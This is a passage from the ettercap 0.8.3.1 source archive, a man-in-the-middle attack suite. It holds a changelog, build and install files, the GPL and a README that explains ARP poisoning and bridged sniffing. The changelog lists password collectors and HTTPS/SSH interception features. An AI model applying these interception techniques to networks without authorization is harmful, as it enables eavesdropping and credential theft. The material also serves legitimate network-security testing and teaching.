poisoner) totally rewritten and tuned up + New programmable filtering engine (see README for details) + Filter can be used in command line mode (-F option) + Possibility to scan only chosen IPs (-H option) + Possibility to select the delay between arp replies (-D option) + Checking for the latest ettercap version (-v option) + More accurate and faster start up host scanning + Connection killing method enhanced + New and more detailed man pages + ENHANCEMENT in the password collector for: HTTP (
parsing) + NEW PLUGIN : spectre, triton !! Fixed the interface shutdown bug... yeah ! !! Fixed "can't find grell_ssl.crt" error message in the rpm version. 0.5.0 20010611 + Full-duplex HTTPS man-in-the-middle support + Support for HTTPS through a proxy + SSH sniffing even from command line + Enable/Disable dissectors via conf file + Public ARP in simple mode + Smart Public arp (all but the target) + Dump of the pass to a file from interactive mode + Packet Factory enhancement (now the payload can be loaded from a file) + The newest config.guess and config.sub are now included + Updated the OS fingerprint database (2001/06/04 09:40:50 fyodor) + NEW password collector for: HTTPS, PROXYHTTPS + ENHANCEMENT in the password collector for: SMB, HTTP, MySQL + FIXED password collector for: IRC + DOCUMENTATION translated in : French, Italian ! Fixed many many bug... but some still persist... ;) 0.4.3 20010511 + Added a Protocol State Machine for dissectors + Added the rule "Log" to the filtering form + Packet Factory (create and send packets on the fly) + Configuration file + Code cleanup !! + Plugins can be launched from connection list + NEW plugin : banshee + ENHANCEMENT in the password collector for: SOCKS 5, IMAP, VNC, SMB, MySQL + FIXED password collector for: SOCKS 5 0.4.2 20010429 + You can specify the IP "ANY" + Logging all data to specific file(s) + Added the "demonization" feature (--quiet) + Packet filtering/dropping/search/replace + Improved the user/password hunting in datadecode module + Tuning of Doppelganger poison/rearp + NEW plugin : lurker + NEW password collector for: NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC + ENHANCEMENT in the password collector for: POP, SMB, MySQL ! fixed a bug in the fingerprint for *BSD ! fixed the handling of eth aliases ! fixed the activation/deactivation of Active Dissectors 0.4.0 20010409 + Full duplex SSH man-in-the-middle support !! + new startup mode (--broadping -b). + new sniffing method (PublicARP) + Injector now supports escape sequences + netmask switch added + added support for getopt_long even on *BSD + NEW password collector for : SSH1, SMB, RLOGIN, HTTP, ICQ, MySQL ! fixed the "sendto() 1518 byte" bug 0.3.1 20010323 ! fixed a nasty bug sniffing/sending big packets ! fixed telnet dissector 0.3.0 20010319 + Ported on OpenBSD 2.7 + UDP support + OS Fingerprint + Network Adapter Fingerprint + Password collector for: FTP, POP, TELNET + Injection interface redesigned + Possibility to check if you are in a switched lan or not. ! various bugfix 0.2.4 20010309 + Ported on FreeBSD 4.x + Plugin version control + Added -x option for hex mode in command line - Removed -1 and -2 options (better getopt parsing) + Ability to sniff in all direction (no more two hosts limit) + Silent mode (--silent or -z) (no arp storm on start up) 0.2.1 20010223 + Scrolling window for plugin output + detailed packets view in hex mode (SEQ, ACK and FLAGS) + identification of connections type (FTP, telnet, ecc) + ability to kill a connection from connection list ! sigfault when no plugin found and press return 0.2.0 20010219 + Plug-In support + Inet module totally rewritten and redesigned. + Downported to 2.0.x Linux Kernels (EXPERIMENTAL) + Added support for glibc 2.0.x 2.1.x 2.2.x + Scroll back in sniffing window (*very* *very* useful !!) ! after injection the connections are cleanly RSTted 0.1.1 20010209 + detect if there is another man-in-the-middle in the LAN + full telnet injection support ! ettercap defaults to the first up and running iface ! removed possible sigfault making host list ! now works with openwall ! various bugfixing 0.1.0.beta 20010125 * Initial public release... + Easy to use ncurses interface + Command line mode (without ncurses) + IP based sniffing (old style sniffing) + MAC based sniffing (for traffic between hosts and gateways) + ARP based sniffing (with arp poisoning for switched lan) + Characters injection in an established connection ettercap-0.8.3.1/CMakeLists.txt000664 000000 000000 00000020503 13711276346 016222 0ustar00rootroot000000 000000 cmake_minimum_required(VERSION 2.8) project(ettercap C) set(VERSION "0.8.3.1") set(CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/Modules") set(CMAKE_SCRIPT_PATH "${CMAKE_SOURCE_DIR}/cmake/Scripts") include(MacroEnsureOutOfSourceBuild) macro_ensure_out_of_source_build("${PROJECT_NAME} requires an out of source build. Please create a separate build directory and run 'cmake /path/to/${PROJECT_NAME} [options]' there.") option(ENABLE_CURSES "Enable curses interface" ON) option(ENABLE_GTK "Enable GTK interface" ON) option(ENABLE_PLUGINS "Enable plugins support" ON) option(ENABLE_IPV6 "Enable IPv6 support" OFF) option(ENABLE_LUA "Enable LUA support (EXPERIMENTAL)" OFF) option(ENABLE_PDF_DOCS "Enable PDF document generation" OFF) option(ENABLE_TESTS "Enable Unit Tests" OFF) option(ENABLE_GEOIP "Build with GeoIP support" ON) option(LIBRARY_BUILD "Build for libettercap only" OFF) option(INSTALL_DESKTOP "Install ettercap desktop files" ON) set(VALID_BUILD_TYPES Debug Release RelWithDebInfo) if(NOT CMAKE_BUILD_TYPE) # Default to using "Release" as our build type. set(CMAKE_BUILD_TYPE "Release" CACHE STRING "Choose the type of build, options are: ${VALID_BUILD_TYPES}." FORCE) endif() list(FIND VALID_BUILD_TYPES ${CMAKE_BUILD_TYPE} contains_valid) if(contains_valid EQUAL -1) message(FATAL_ERROR "Unknown CMAKE_BUILD_TYPE: '${CMAKE_BUILD_TYPE}'. Valid options are: ${VALID_BUILD_TYPES}") endif() unset(contains_valid) include(CMakeDependentOption) # If SYSTEM_LIBS is set to off, then all SYSTEM_* options will be # set to off. option(SYSTEM_LIBS "Search for system-provided libraries. This is only used for libraries that we happen to also bundle. Disabling this implies that we would only use bundled libraries." ON) # If BUNDLED_LIBS is set to off, then all BUNDLED_* options will be # set to off. option(BUNDLED_LIBS "Use bundled libraries if system provided versions are not found (or disabled)" ON) cmake_dependent_option(SYSTEM_CURL "Search for a system-provided version of Curl" ON SYSTEM_LIBS OFF) cmake_dependent_option(BUNDLED_CURL "Use bundled version of Curl if system-provided version is not found (or disabled)" ON BUNDLED_LIBS OFF) cmake_dependent_option(SYSTEM_LIBNET "Search for a system-provided version of LIBNET" ON SYSTEM_LIBS OFF) cmake_dependent_option(BUNDLED_LIBNET "Use bundled version of LIBNET if system-provided version is not found (or disabled)" ON BUNDLED_LIBS OFF) cmake_dependent_option(SYSTEM_LUAJIT "Search for a system-provided version of LUAJIT" ON "SYSTEM_LIBS;ENABLE_LUA" OFF) cmake_dependent_option(BUNDLED_LUAJIT "Use bundled version of LUAJIT if system-provided version is not found (or disabled)" ON "BUNDLED_LIBS;ENABLE_LUA" OFF) if(ENABLE_TESTS) cmake_dependent_option(SYSTEM_LIBCHECK "Search for a system-provided version of LIBCHECK" ON SYSTEM_LIBS OFF) cmake_dependent_option(BUNDLED_LIBCHECK "Use bundled version of LIBCHECK if system-provided version is not found (or disabled)" ON BUNDLED_LIBS OFF) endif() set(SPECIAL_LIB_DIR "" CACHE PATH "Special (non-traditional) root directory where headers/libraries are installed") include(CheckVariableInHeaders) include(EttercapOSTest) #Check and see if we're running Darwin, specify the CMAKE_LIBARY_PATH to do so if(OS_DARWIN) set(CMAKE_SYSTEM_NAME Darwin) set(CMAKE_LIBRARY_PATH ${SPECIAL_LIB_DIR}/lib ${CMAKE_LIBRARY_PATH}) set(CMAKE_INCLUDE_PATH ${SPECIAL_LIB_DIR}/include ${CMAKE_INCLUDE_PATH}) else() set(CMAKE_LIBRARY_PATH ${CMAKE_LIBRARY_PATH} /usr/lib64 /usr/lib32) endif() if(LIBRARY_BUILD) set(ENABLE_GTK OFF) set(ENABLE_CURSES OFF) set(JUST_LIBRARY 1) endif() include(EttercapHeadersCheck) include(EttercapLibCheck) include(EttercapVariableCheck) set(INSTALL_PREFIX ${CMAKE_INSTALL_PREFIX} CACHE PATH "Installation prefix") set(INSTALL_SYSCONFDIR /etc CACHE PATH "System configuration directory") set(INSTALL_LIBDIR ${INSTALL_PREFIX}/lib${LIB_SUFFIX} CACHE PATH "Library installation directory") set(INSTALL_DATADIR ${INSTALL_PREFIX}/share CACHE PATH "Data installation directory") set(INSTALL_EXECPREFIX ${INSTALL_PREFIX} CACHE PATH "") set(INSTALL_BINDIR ${INSTALL_PREFIX}/bin CACHE PATH "Binary files installation directory") if(OS_DARWIN OR OS_BSD_FREE OR OS_WINDOWS) set(POLKIT_DIR ${INSTALL_PREFIX}/share/polkit-1/actions/ CACHE PATH "Polkit installation directory") else() #at least on ubuntu, polkit dir couldn't be /usr/local/share, but should be /usr/share set(POLKIT_DIR /usr/share/polkit-1/actions/ CACHE PATH "Polkit installation directory") endif() set(PKEXEC_INSTALL_WRAPPER org.pkexec.ettercap CACHE PATH "Name of the pkexec action file") set(DESKTOP_DIR ${INSTALL_PREFIX}/share/applications/ CACHE PATH "Desktop file installation directory") set(METAINFO_DIR ${INSTALL_PREFIX}/share/metainfo/ CACHE PATH "Metainfo file installation directory") set(ICON_DIR ${INSTALL_PREFIX}/share/pixmaps CACHE PATH "Icon file installation directory") set(MAN_INSTALLDIR ${INSTALL_PREFIX}/share/man CACHE PATH "Path for manual pages") if(NOT DISABLE_RPATH) # Ensure that, when we link to stuff outside of our build path, we include the # library dir path in our RPATH. set(CMAKE_INSTALL_RPATH_USE_LINK_PATH TRUE) set(CMAKE_MACOSX_RPATH 1) endif() # set general build flags for debug build-type set(CMAKE_C_FLAGS_DEBUG "-O0 -ggdb3 -DDEBUG -fno-common -Wall -Wno-pointer-sign -D_FORTIFY_SOURCE=2 -Wformat -Wformat-security -Werror=format-security -Wextra -Wredundant-decls" CACHE STRING "" FORCE) ## append ASAN build flags if compiler version has support #if("${CMAKE_C_COMPILER_ID}" STREQUAL "GNU") # if(CMAKE_C_COMPILER_VERSION VERSION_GREATER 4.8) # set(CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} -fsanitize=address # -fno-omit-frame-pointer" CACHE STRING "" FORCE) # message("Building with ASAN support (GNU compiler)") # else() # message("Building without ASAN support (GNU compiler)") # endif() #elseif("${CMAKE_C_COMPILER_ID}" STREQUAL "Clang") # if(CMAKE_C_COMPILER_VERSION VERSION_GREATER 3.1) # set(CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} -fsanitize=address # -fno-omit-frame-pointer" CACHE STRING "" FORCE) # message("Building with ASAN support (Clang compiler)") # elseif(CMAKE_C_COMPILER_VERSION VERSION_GREATER 3.1) # message("Building without ASAN support (Clang compiler)") # endif() #endif() # set build flags for release build-type set(CMAKE_C_FLAGS_RELEASE "-O2 -w -D_FORTIFY_SOURCE=2" CACHE STRING "" FORCE) if(OS_DARWIN) set(CMAKE_EXE_LINKER_FLAGS "-Wl" CACHE STRING "" FORCE) set(CMAKE_EXE_LINKER_FLAGS_DEBUG "-Wl" CACHE STRING "" FORCE) set(CMAKE_MODULE_LINKER_FLAGS "-Wl" CACHE STRING "" FORCE) set(CMAKE_SHARED_LINKER_FLAGS "-undefined dynamic_lookup" CACHE STRING "" FORCE) endif() if(ENABLE_LUA) include(EttercapLuajit) set(HAVE_EC_LUA 1) endif() if(CURL_FOUND) set(HAVE_CURL 1) endif() set(EC_INCLUDE_PATH ${CMAKE_CURRENT_BINARY_DIR}/include ${CMAKE_SOURCE_DIR}/include ${EC_INCLUDE}) include_directories(${EC_INCLUDE_PATH}) add_subdirectory(src) if(INSTALL_DESKTOP) add_subdirectory(desktop) endif() if(HAVE_PLUGINS) if(OS_MINGW) message("Sorry, plugins support on Windows is currently unavailable") else() add_subdirectory(plug-ins) endif() endif() add_subdirectory(utils) add_subdirectory(share) add_subdirectory(man) if(ENABLE_IPV6) set(WITH_IPV6 TRUE) endif() # This line should ALWAYS be after all options are defined configure_file(include/config.h.cmake ${CMAKE_CURRENT_BINARY_DIR}/include/config.h) if(ENABLE_TESTS) enable_testing() add_subdirectory(tests) endif() # uninstall target configure_file( "${CMAKE_SCRIPT_PATH}/cmake_uninstall.cmake.in" "${CMAKE_CURRENT_BINARY_DIR}/cmake_uninstall.cmake" IMMEDIATE @ONLY) add_custom_target(uninstall COMMAND ${CMAKE_COMMAND} -P ${CMAKE_CURRENT_BINARY_DIR}/cmake_uninstall.cmake) # Add a target that will ensure that the build directory is properly cleaned. add_custom_target(clean-all COMMAND ${CMAKE_BUILD_TOOL} clean COMMAND ${CMAKE_COMMAND} -P ${CMAKE_SCRIPT_PATH}/clean-all.cmake ) # If we notice that this isn't the first time they've run if(NOT ("${CMAKE_CACHEFILE_DIR}" STREQUAL "")) message("") message("HAVING TROUBLE BUILDING ETTERCAP? ") message("") message(" 1. Install any missing dependencies") message(" 2. run 'make clean-all'") message(" 3. run 'cmake ${CMAKE_SOURCE_DIR}'") message("") endif() include(FeatureSummary) feature_summary(WHAT ALL) ettercap-0.8.3.1/INSTALL000664 000000 000000 00000001507 13711276346 014516 0ustar00rootroot000000 000000 The easiest way: $ mkdir build $ cd build $ cmake ../ $ make $ make install If the build fails because you're missing a dependency: $ (Install any missing dependencies.) $ make clean-all $ cmake ../ $ make $ make install #### Bundled libraries Ettercap now bundles the following libraries with the source distribution: libnet 1.2 curl 7.71.1 luajit 2.0.5 check 0.15.0 We will build bundled libraries that Ettercap depends upon, so you don't have to! By default, the build system will search for system-provided libraries. If it doesn't find the particular library it wants, it will build the library, itself. # To disable the use of bundled libraries: $ cmake -DBUNDLED_LIBS=Off ../ # To disable the searching for system-provided libraries, and use # bundled libraries exclusively: $ cmake -DSYSTEM_LIBS=Off ../ ettercap-0.8.3.1/LICENSE000664 000000 000000 00000043254 13711276346 014477 0ustar00rootroot000000 000000 GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. ettercap-0.8.3.1/LICENSE.OPENSSL000664 000000 000000 00000000371 13711276346 015612 0ustar00rootroot000000 000000 This program is released under the GPL with the additional exemption that compiling, linking, and/or using OpenSSL is allowed. if you are asking yourself the meaning of this phrase, look there: http://www.openssl.org/support/faq.html#LEGAL2 ettercap-0.8.3.1/README000664 000000 000000 00000046314 13711276346 014352 0ustar00rootroot000000 000000 ============================================================================== ============================================================================== @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@ @@@@@@@ @@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@ @@@ @@@ @@@@@@@ @@ @@@ @@@@@@@ @@ @@ @@ A suite for man in the middle attacks Copyright 2001-2019 The Ettercap Dev Team ============================================================================== ============================================================================== Aoccdrnig to rscheearch at an Elingsh uinervtisy, it deosn't mttaer in waht oredr the ltteers in a wrod are, the olny iprmoetnt tihng is taht the frist and lsat ltteer are in the rghit pclae. The rset can be a toatl mses and you can sitll raed it wouthit a porbelm. Tihs is bcuseae we do not raed ervey lteter by it slef but the wrod as a wlohe and the biran fguiers it out aynawy. ... so please excuse us for every typo in the documentation, man pages or code, btw fixes and patches are welcome. ============================================================================== ============================================================================== R E Q U I R E D P R O G R A M S ============================================================================== C compiler flex (or other lex-compatible parser generator) for *.l files bison (or other yacc-compatible parser generator) for *.y files cmake (build tool) ============================================================================== R E Q U I R E D L I B R A R I E S ============================================================================== MANDATORY: - libpcap >= 0.8.1 - libnet >= 1.1.2.1 (>= 1.1.5 for IPv6 support) - openssl >= 0.9.7 - libpthread - zlib - libgeoip - CMake 2.8 - Curl >= 7.26.0 to build SSLStrip plugin If you don't want to enable SSLStrip plugin you have to disable it. (more information about disabling a plugin in the README.GIT file) OPTIONAL: To avoid use of our internal strlcat and strlcpy implementation: - libbsd To enable PDF documentation generation (enable via ENABLE_PDF_DOCS=On): - groff To enable plugins: - libltdl (part of libtool) To have perl regexp in the filters: - libpcre For the cursed GUI: - ncurses >= 5.3 For the GTK+ GUI: - Glib >= 2.2.2 - Gtk+3 >= 3.12.0 (recommended >= 3.22.0) - Atk >= 1.2.4 - Pango >= 1.2.3 If you are running on debian, or any debian based distro you can install the required dependencies by running: apt-get install debhelper bison check cmake flex groff libbsd-dev \ libcurl4-openssl-dev libgeoip-dev libgtk-3-dev libltdl-dev libluajit-5.1-dev \ libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev ============================================================================ LICENSE ============================================================================ see LICENSE file for details... ============================================================================ AUTHORS ============================================================================ Alberto Ornaghi (ALoR) Marco Valleri (NaGA) Emilio Escobar (exfil) Eric Milam (J0hnnyBrav0) Gianfranco Costamagna (LocutusOfBorg) Alexander Koeppe (koeppea) ============================================================================ INSTALLATION ============================================================================ The easiest way to compile ettercap is in the form: mkdir build cd build cmake .. (Use ccmake . to change options such as disabling IPv6 support, add plugins support, etc). make install read INSTALL for further details... and README.PLATFORMS for any issue regarding your operating system. ============================================================================ HOW TO USE IT ============================================================================ You can choose between 3 User Interfaces: Text mode, Curses, GTK. Please read the man pages ettercap(8) and ettercap_curses(8) to learn how to use ettercap. ============================================================================ TECHNICAL PAPER ============================================================================ THE HOST LIST Sending one ARP REQUEST for each ip in the lan (looking at the current ip and netmask), it is possible to get the ARP REPLIES and then make the list of the hosts that are responding on the lan. With this method even windows hosts, reply to the call-for-reply (they don't reply on broadcast-ping). Be very careful if the netmask is a class B (255.255.0.0) because ettercap will send 255*255 = 65025 arp requests (the default delay between two requests is 1 millisecond, can be configured in etter.conf) UNIFIED SNIFFING Ettercap NG uses the unified sniffing method which is the base for all the attacks. The kernel ip forwarding is always disabled and this task is accomplished by ettercap itself. Packet that needs to be forwarded are packets with destination mac address equal to the attacker's one, but with different ip address. Those packets are re-sent back to the wire to the real destination. This way, you can plug in various mitm attacks at a time. You can even use external attacker/poisoner, they only have to redirect packets to ettercap's host and the game is over ;) BRIDGED SNIFFING Uses two network interfaces and forwards the traffic between them while performing sniffing and content filtrating. This sniffing method is very stealthy as there is no way to to detect that someone is in the middle. You can look at this as a layer one attack. Don't use it on gateways or it will transform your gateway into a bridge. HINT: You can use the content filtering engine to drop packets that should not pass. This way ettercap will work as an inline IPS ;) ARP POISONING ATTACK When you select this method, ettercap will poison the arp cache of the two hosts, identifying itself as the other host respectively (see the next section for this). Once the arp caches are poisoned, the two hosts start the connection, but their packets will be sent to us, and we will record them and, next, forward them to the right side of the connection. So the connection is transparent to the victims, not arguing that they are sniffed. The only method to discover that there is a man-in-the-middle in your connection, is to watch at the arp cache and check if there are two hosts with the same mac address! That is how we discover if there are others poisoning the arp cache in our LAN, thus being warned, that our traffic is under control! =) HOST 1 - - - - - - - - - - - - - - - - - - - -> HOST 2 (poisoned) (poisoned) | ^ | | ------------> ATTACKER HOST ------------------ ( ettercap ) Legenda: - - - -> the logic connection -------> the real one The arp protocol has an intrinsic insecurity. In order to reduce the traffic on the cable, it will insert an entry in the arp cache even if it wasn't requested. In other words, EVERY arp reply that goes on the wire will be inserted in the arp table. So, we take advantage of this "feature", sending fake arp replies to the two hosts we will sniff. In this reply we will tell that the mac address of the second host is the one hard-coded on OUR ethernet card. This host will now send packets that should go to the first host, to us, because he carries our mac address. The same process is done for the first host, in inverse manner, so we have a perfect man-in-the-middle connection between the two hosts, legally receiving their packets!! Example: HOST 1: mac: 01:01:01:01:01:01 ATTACKER HOST: ip: 192.168.0.1 mac: 03:03:03:03:03:03 ip: 